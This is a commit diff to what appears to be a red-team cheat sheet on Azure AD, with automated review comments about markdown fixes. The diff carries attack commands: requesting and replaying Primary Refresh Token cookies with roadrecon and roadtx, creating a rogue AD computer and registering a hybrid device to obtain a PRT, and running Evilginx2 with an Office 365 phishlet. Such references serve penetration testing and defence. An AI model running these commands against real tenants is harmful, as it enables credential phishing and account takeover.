Fix markdown typo
parent
8a4e7f82ae
commit
ce9e94fe47
|
@ -114,25 +114,28 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
|
||||||
* No method known to date.
|
* No method known to date.
|
||||||
|
|
||||||
|
|
||||||
### Use PRT cookie
|
### Request a PRT using the Refresh Flow
|
||||||
|
|
||||||
* `roadrecon auth prt-init`
|
* Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
|
||||||
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof)
|
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
|
||||||
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug`
|
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
|
||||||
* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
|
* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
|
||||||
|
|
||||||
|
|
||||||
### Request a PRT with Hybrid Device
|
### Request a PRT with Hybrid Device
|
||||||
|
|
||||||
Requirements:
|
Requirements:
|
||||||
|
|
||||||
* ADDS user credentials
|
* ADDS user credentials
|
||||||
* hybrid environment (ADDS and Azure AD)
|
* hybrid environment (ADDS and Azure AD)
|
||||||
|
|
||||||
Use the user account to create a computer and request a PRT
|
Use the user account to create a computer and request a PRT
|
||||||
|
|
||||||
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
|
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
|
||||||
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
|
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
|
||||||
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
|
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
|
||||||
* Get a PRT with device claim
|
* Get a PRT with device claim
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
|
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
|
||||||
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
|
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
|
||||||
|
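Review bot: The `[login.microsoftonline.com ](login.microsoftonline.com )` bullet is carried over unchanged even though the commit is titled as a markdown fix. The target has no scheme and both the text and the target carry a trailing space, so most renderers will treat it as a relative link or not link it at all; `[login.microsoftonline.com](https://login.microsoftonline.com)` would fix it. In the same hunk, the new `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>` alternative uses a different placeholder from the `<prt-cookie>` in the `roadrecon` command beside it, so pick one name for the same value. The unchanged `-u <username>@h<domain>` in the `roadtx prt` line appears to have a stray `h`. Renaming the heading from "Use PRT cookie" to "Request a PRT using the Refresh Flow" also changes its anchor, so any table-of-contents or cross-page links to the old anchor need updating.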
@ -157,3 +160,4 @@ Use the user account to create a computer and request a PRT
|
||||||
|
|
||||||
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
||||||
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
|
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
|
||||||
|
* [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike)
|
|
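Review bot: The added reference "PRT Abuse from Userland with Cobalt Strike - 0xbad53c" has no publication date, while the TrustedSec entry two lines above follows a title, author, date pattern. Add the date if the source gives one so the list stays consistent. This is also a new reference rather than a typo fix, so the commit title undersells the change.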
@ -102,7 +102,7 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
|
||||||
|
|
||||||
## Phishing with Evilginx2
|
## Phishing with Evilginx2
|
||||||
|
|
||||||
* Run `evilginx2` with o365 phishlet
|
* Run [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) with o365 phishlet
|
||||||
```powershell
|
```powershell
|
||||||
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
|
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
|
||||||
: config domain username.corp
|
: config domain username.corp
|
||||||
|
|
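Review bot: Turning `evilginx2` into the `[kgretzky/evilginx2](https://github.com/kgretzky/evilginx2)` link in the "Run ... with o365 phishlet" bullet is a content change in what looks like a second file (the hunk offsets restart at 102), which "Fix markdown typo" does not describe. Consider retitling the commit or splitting it. While touching this bullet, note that the fence directly below it is tagged `powershell` but contains the tool's own `: config domain username.corp` prompt line, so a neutral tag such as `text` would highlight more accurately. Indenting the fence under the bullet would also keep it inside the list item.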